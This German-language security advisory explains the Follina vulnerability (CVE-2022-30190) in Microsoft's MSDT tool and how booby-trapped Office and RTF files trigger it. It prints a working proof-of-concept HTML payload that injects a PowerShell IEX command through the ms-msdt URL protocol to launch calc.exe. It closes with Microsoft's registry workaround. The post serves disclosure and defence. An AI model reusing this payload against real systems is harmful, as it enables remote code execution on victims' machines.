Follina ist eine neu entdeckte Schwachstelle, die das Microsoft Support Diagnostic Tool (MSDT) mit Hilfe von speziell erstellten Microsoft Office und Rich-Text-Format-Dateien ausnutzt. Es handelt sich dabei um eine RCE-Schwachstelle, die es einem Angreifer erlaubt, Schadcode auf dem System auszuführen.
UPDATE: Microsoft hat mittlerweile einen Patch und Update Guide veröffentlicht.
Damit die Schwachstelle ausgenutzt werden, kann muss ein Opfer ein Office Dokument öffnen (z.B. .docx
Dateien) oder sich die Vorschau einer Rich-Text-Format-Datei (.rtf
) im Windows Explorer ansehen. Word Makros werden für die Schwachstelle nicht benötigt.
Der Angriff kann mit Hilfe eines Microsoft-Office-Dokuments nachgestellt werden, welches ein bösartiges OLEObject enthält. Wird ein solches Dokument in Microsoft Word geöffnet, werden HTML-Inhalte vom Server des Angreifers nachgeladen. Dieses HTML enthält die Payload, welche einen Fehler in MSDT ausnutzt um Schadcode auszuführen (Codeausschnitt von JMousqueton):
<!doctype html>
<html lang="en">
<body>
<script>
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
// ... Den Kommentar mit den A's für 60 Zeilen wiederholen
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_Sele
ctProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../W
indows/System32/mpsigstub.exe \"";
</script>
</body>
</html>
In dem obigen Ausschnitt enthält window.location.href
die Payload, welche ausgeführt wird, sobald das ms-msdt
URL-Protokoll verarbeitet wird. In diesem Fall wird der Windows Taschenrechner (calc.exe
) gestartet.
Eine ausführliche Anleitung, wie ein solches bösartiges Dokument erstellt wird, finden Sie hier.
Mitigation
Die aktuellste Microsoft Defender Version blockiert die beiden Angriffsvektoren. Hierfür wird das Öffnen von ms-msdt
Links innrehalb von Microsoft Word blockiert und weiteres verdächtiges Verhalten unterbunden. Weiterhin haben unsere Tests ergeben, dass die neueste Word Version (Build 2205) diesen spezifischen Angriff verhindert. Daher gilt wie immer: Updates einspielen und auf dem Laufenden bleiben.
Weiterhin hat Microsoft für diese Schwachstelle eine Empfehlung gegeben: Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability.
Als Workaround wird empfohlen, das MSDT URL-Protokoll zu deaktivieren, indem der entsprechende Registry Key gelöscht wird. Die folgenden Befehle (bereitgestellt von Microsoft) erzielen genau das und müssen in einem Command Prompt als Administrator ausgefürt werden:
# Erstellung eines Backups des Registry Eintrags.
# 'filename' ist der Name der Backup Datei und muss geändert werden.
reg export HKEY_CLASSES_ROOT\ms-msdt filename
# Löschung des ms-msdt Eintrags, was das MSDT URL-Protokoll deaktiviert.
reg delete HKEY_CLASSES_ROOT\ms-msdt /f
Um das Workaround wieder Rückgängig zu machen muss der Registry Eintrag mit Hilfe der Backup Datei wiederhergestellt werden:
# Import der oben erstellten Backup Datei 'filename' in die Registry.
# Dadurch wird der MSDT Eintrag wiederhergestellt und das MSDT Protokoll wieder aktiviert.
reg import filename